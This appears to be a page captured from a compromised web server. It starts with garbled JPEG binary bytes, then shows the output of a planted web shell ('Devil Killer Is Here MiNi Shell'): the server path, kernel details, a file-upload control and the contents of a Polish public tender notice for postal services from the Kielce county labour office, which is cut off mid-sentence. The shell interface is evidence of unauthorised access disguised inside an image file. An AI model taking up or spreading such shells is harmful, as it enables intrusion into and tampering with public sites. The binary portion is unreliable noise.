JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240813/0045596001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług pocztowych w obrocie krajowym<br/>i zagranicznym w zakresie odbioru, przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz zwrotu<br/>przesyłek niedoręczonych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Urząd Pracy w Kielcach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291149104</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolberga 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kielce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">25-620</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kiki@praca.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">kielce.praca.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług pocztowych w obrocie krajowym<br/>i zagranicznym w zakresie odbioru, przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz zwrotu<br/>przesyłek niedoręczonych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e8037072-e560-4572-a477-29720045f0b7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00455960</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00066144/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Usługi pocztowe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kielce-praca.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Oferta wraz z załącznikami musi być złożona za pośrednictwem Platformy<br/>przetargowej pod adresem:<br/>https://kielce-praca.logintrade.net/rejestracja/ustawowe.html<br/>Komunikacja pomiędzy zamawiającym a wykonawcami, w szczególności składanie oświadczeń, wniosków, zawiadomień oraz<br/>przekazywanie informacji (innych niż oferta Wnioskodawcy), odbywa się przy użyciu środków komunikacji elektronicznej, tj.<br/>za pośrednictwem Platformy przetargowej pod adresem:<br/>https://kielce-praca.logintrade.net/rejestracja/ustawowe.htm</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postepowanie prowadzone jest w<br/>języku polskim.<br/>2. Komunikacja pomiędzy zamawiającym a wykonawcami, w szczególności składanie oświadczeń, wniosków, zawiadomień oraz<br/>przekazywanie informacji (innych niż oferta Wnioskodawcy), odbywa się przy użyciu środków komunikacji elektronicznej, tj.<br/>za pośrednictwem Platformy przetargowej pod adresem:<br/>https://kielce-praca.logintrade.net/rejestracja/ustawowe.html<br/>3. Ofertę składa się pod rygorem nieważności, zgodnie z wyborem wykonawcy:<br/>1) w formie elektronicznej (oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym),<br/>2) w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym wyłącznie poprzez Platformę przetargową.<br/>4. Przyjmuje się, że dokument wysłany przy użyciu Platformy przetargowej został doręczony wykonawcy w sposób umożliwiający<br/>zapoznanie się z jego treścią, w dniu jego przekazania na Platformę przetargową.<br/>5. Wykonawca zamierzający złożyć ofertę zobowiązany jest zapoznać się z instrukcjami użytkowników Platformy przetargowej -<br/>dostępnymi pod adresem: https://kielce-praca.logintrade.net/rejestracja/instrukcje.html oraz zaakceptować regulamin korzystania z<br/>Platformy przetargowej dostępny pod adresem: https://kielce-praca.logintrade.net/rejestracja/rejestracja.html<br/>6. Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia oferty zostały opisane w<br/>Instrukcjach użytkowników Platformy przetargowej.<br/>7. Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie internetowej Platformy<br/>przetargowej - pod adresem: https://kielce-praca.logintrade.net/rejestracja/instrukcje.html<br/>8. Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj. Logintrade SA ul. Legnicka 57D, lokal<br/>B/J, 54-203 Wrocław, nr tel. 71 787 35 34, e-mail: helpdesk@logintrade.net od poniedziałku do piątku (dni robocze) w godz. 800 -<br/>1600.<br/>9. Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach<br/>danych określonych w przepisach wydanych na podstawie §2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz. 2452), tj. formaty plików wykorzystywanych<br/>przez wykonawców powinny być zgodne z Obwieszczeniem Prezesa Rady Ministrów z dnia 9 listopada 2017 r. w sprawie ogłoszenia<br/>jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla<br/>rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych.<br/>10. Zamawiający rekomenduje wykorzystanie formatów: .pdf, .doc, .docx, .xls, .xlsx, .jpg, (.jpeg) ze szczególnym wskazaniem na<br/>.pdf. W celu ewentualnej kompresji danych zamawiający rekomenduje wykorzystanie formatu .zip, .7Z.<br/>11. Maksymalny rozmiar pojedynczego pliku to 150 MB, przy czym nie określa się limitu liczby plików.<br/>12. Zalecenia zamawiającego dotyczące kwalifikowanego podpisu elektronicznego:<br/>1) dla dokumentów w formacie .pdf – format PAdES<br/>2) dla dokumentów innych niż .pdf – format XAdES</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Informacje dotyczące administratora danych Administratorem danych osobowych Pani/Pana jest Powiatowy Urząd Pracy<br/>w Kielcach reprezentowany przez Dyrektora Urzędu z siedzibą w Kielcach, przy<br/>ul. Kolberga 4, 25-620 Kielce, tel. 41-367-11-07, email: kiki@praca.gov.pl.2. Inspektor ochrony danych – IOD<br/>W sprawach związanych z przetwarzaniem Pani/Pana danych przez Administratora można kontaktować się z wykorzystaniem<br/>powyższych danych lub z wyznaczonym Inspektorem Ochrony Danych pod numerem telefonu 41-367-11-77, drogą elektroniczną na<br/>adres email: iod@kielce.praca.gov.pl lub pisemnie na adres: Powiatowy Urząd Pracy w Kielcach, Inspektor Ochrony Danych, ul.<br/>Kolberga 4, 25-620 Kielce.<br/>3. Cel przetwarzania danych osobowych oraz podstawa prawna<br/>Pani/Pana dane niezbędne do udziału w postępowaniu będą przetwarzane w celu związanym z realizacją postępowania o udzielenie<br/>zamówienia publicznego na podstawie ustawy Prawo zamówień publicznych, w tym zawarcia umowy oraz działanie przez<br/>administratora w interesie publicznym, zgodnie z art. 6 ust. 1 lit. c, e oraz art. 10 RODO.<br/>4. Odbiorcy danych osobowych<br/>Ze względu na jawność postępowania o udzielenie zamówienia publicznego, odbiorcami Pani/Pana danych osobowych mogą być<br/>wszystkie zainteresowane osoby lub podmioty. Ograniczenie dostępu do danych może wystąpić jedynie<br/>w szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, interesem publicznym lub informacja stanowi tajemnicę<br/>przedsiębiorstwa.<br/>Ponadto Pani/Pana dane mogą być udostępnione firmom zapewniającym wsparcie informatyczne, operatorom pocztowym, firmie z<br/>którą PUP w Kielcach zawarł umowę na świadczenie usług w zakresie niszczenia dokumentów.<br/>5. Okres przechowywania<br/>Pani/Pana dane osobowe będą przechowywane przez obowiązujący okres przechowywania dokumentacji związanej z realizacją<br/>zadania publicznego tj. przez okres niezbędny do realizacji celów określonych w pkt. 3, a po tym czasie przez okres i w zakresie<br/>wymaganym przez przepisy obowiązującego prawa. Zgodnie<br/>z regulacjami obowiązującymi w tym zakresie - Instrukcją kancelaryjną i Jednolitym Rzeczowym Wykazem Akt Powiatowego Urzędu<br/>Pracy w Kielcach, okres przechowywania dokumentacji wynosi 5 lat, a w przypadku dokumentacji zamówień publicznych<br/>dotyczących przetargów gdzie finansowanie realizowane jest<br/>z Europejskiego Funduszu Społecznego okres przechowywania dokumentacji wynosi 10 lat.<br/>6. Przysługujące uprawnienia<br/>Posiada Pani/Pan prawo żądania dostępu do treści swoich danych i ich sprostowania oraz ograniczenia przetwarzania.<br/>Przepisy PZP ograniczają prawo do skorzystania ze:<br/>- sprostowania lub uzupełnienia danych (art. 16 RODO) jeżeli zrealizowanie tego prawa mogłoby skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia lub zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym<br/>z PZP;<br/>- z ograniczenia przetwarzania (art. 18 RODO), które nie może zostać zrealizowane do czasu zakończenia tego postępowania.<br/>7. Informacje o prawie wniesienia skargi do organu nadzorczego<br/>Każda osoba, której dane są przetwarzane przez Administratora ma prawo żądania<br/>dostępu do swoich danych osobowych, a także ich sprostowania (poprawiania).<br/>Przysługuje jej także prawo do żądania usunięcia lub ograniczenia przetwarzania,<br/>a także sprzeciwu wobec przetwarzania, przy czym przysługuje ono jedynie<br/>w sytuacji, jeżeli dalsze przetwarzanie nie jest niezbędne do wywiązania się przez Administratora z obowiązku prawnego i nie<br/>występują inne nadrzędne prawne podstawy przetwarzania. Ponadto można wnieść skargę na realizowane przez Administratora<br/>przetwarzanie danych do Prezesa Urzędu Ochrony Danych Osobowych Adres: Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-<br/>193 Warszawa lub za pomocą elektronicznej skrzynki podawczej Urzędu Ochrony Danych Osobowych, dostępnej na stronie<br/>https://www.uodo.gov.pl/pl/p/kontakt.<br/>8. Obowiązek podania danych<br/>Podanie przez Panią/Pana danych osobowych jest wymagane przepisami PZP do wzięcia udziału w postępowaniu.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania<br/>lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ROP.261.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług pocztowych w obrocie krajowym<br/>i zagranicznym w zakresie odbioru, przyjmowania, przemieszczania i doręczania przesyłek pocztowych oraz zwrotu<br/>przesyłek niedoręczonych dla potrzeb Powiatowego Urzędu Pracy w Kielcach </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">64110000-0 - Usługi pocztowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-11-01 do 2026-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">6</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Możliwość nieodpłatnego śledzenia przez Internet rejestrowanych przesyłek listowych w obrocie krajowym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">1,5</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarantowany termin w dniach zwrotu do nadawcy przesyłki pocztowej awizowanej,niepodjętej w terminie lub/i zwrotnego potwierdzenia odbioru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2,5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca uczestniczący w postępowaniu musi spełnić niżej wymienione warunki udziału w postępowaniu dotyczące:<br/>1. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>2. zdolności technicznej lub zawodowej.<br/>1. Dokumentem potwierdzającym, że wykonawca posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub czynności objętych przedmiotem zamówienia jest wpis do rejestru operatorów pocztowych.<br/>Zamawiający dokona oceny spełniania ww. warunku poprzez samodzielną weryfikację wpisu do rejestru operatorów<br/>pocztowych w elektronicznej bazie prowadzonej przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z ustawą z dnia<br/>23 listopada 2012 r. Prawo pocztowe (t.j. Dz.U. z 2023 r. poz. 1640 z późn. zm). poprzez dane zawarte<br/>w formularzu ofertowym.<br/>Warunek zostanie uznany za spełniony, jeżeli wykonawca posiada powyższy wpis.<br/>2. Zamawiający uzna warunek dotyczący zdolności technicznej lub zawodowej, gdy wykonawca wykaże, że wykonał bądź<br/>wykonuje, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności<br/>gospodarczej jest krótszy – w tym okresie co najmniej 2 usługi w zakresie świadczenia usług pocztowych w obrocie krajowym i zagranicznym, o wartości minimum 100 000,00 PLN brutto<br/>(słownie: sto tysięcy złotych) w ramach jednej umowy.<br/>Ocenia spełnienia niniejszego warunku nastąpi na podstawie załączonego przez wykonawcę wykazu usług wg wzoru<br/>stanowiącego załącznik nr 7 do SWZ. W przypadku usług aktualnie wykonywanych należy podać wartość wykonanej części<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. wpis<br/>do rejestru operatorów pocztowych w elektronicznej bazie prowadzonej przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z<br/>ustawą z dnia 23 listopada 2012 r. Prawo pocztowe (t.j. Dz.U. z 2023 r. poz. 1640 z późn. zm.)<br/>2.wypełniony i podpisany wykaz usług wykonanych/wykonywanych w okresie ostatnich trzech lat - załącznik nr 7 do SWZ oraz<br/>dokumenty potwierdzające, że usługi te zostały wykonane należycie;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany umowy w zakresie:<br/>a) obowiązującej stawki VAT: jeżeli zmiana stawki VAT będzie powodować zwiększenie wartości umowy, Zamawiający<br/>dopuszcza możliwość zwiększenia wynagrodzenia<br/>o kwotę równą zwiększonej kwocie podatku zapłaconego przez Wykonawcę przy jednoczesnym zachowaniu niezmienionej<br/>ceny netto;<br/>b) obowiązującej stawki VAT: jeżeli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po<br/>stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę równą zmniejszonej kwocie<br/>podatku zapłaconego przez Wykonawcę przy jednoczesnym zachowaniu niezmienionej ceny netto;<br/>c) w przypadku zmian będących następstwem okoliczności leżących po stronie Zamawiającego dotyczących:<br/> likwidacji Lokalnego Punktu Informacyjno-Konsultacyjnego związanych ze zmianami organizacyjnymi Zamawiającego,<br/> konieczności powstania nowego Lokalnego Punktu Informacyjno-Konsultacyjnego wynikających ze zmian organizacyjnych<br/>Zamawiającego,<br/>d) zmian o których mowa w § 5 ust. 10 pkt 2, 3 , 4 i 5 oraz ust. 15 umowy stanowiącej załącznik nr 9 do SWZ.<br/>2. Zmiana wynagrodzenia, o której mowa w ust. 10 pkt 2-4 umowy nastąpi wyłącznie po przedłożeniu przez Wykonawcę<br/>dowodów potwierdzających wpływ zmian, o których mowa w ust. 10 pkt 2-4 umowy na koszty wykonania zamówienia przez<br/>Wykonawcę. Wykonawca przedłoży Zamawiającemu wykaz osób zatrudnionych do realizacji Umowy, dla których zmiany<br/>wymienione w ust. 10 pkt 2-4 umowy mają zastosowanie wraz z kalkulacją kosztów, wynikającą z przedmiotowej zmiany.<br/>3. Zmiany, o których mowa w ust. 10 umowy, obowiązywać będą:<br/>1) w przypadku ust. 10 pkt. 1 umowy od daty wejścia w życie zmienionych przepisów o podatku od towarów i usług, dotyczyć<br/>będą niezrealizowanej części zamówienia, przy czym kwota wynagrodzenia netto Wykonawcy nie ulegnie zmianie,<br/>2) w przypadku ust. 10 pkt. 2, 3 i 4 umowy od pierwszego dnia miesiąca następującego po 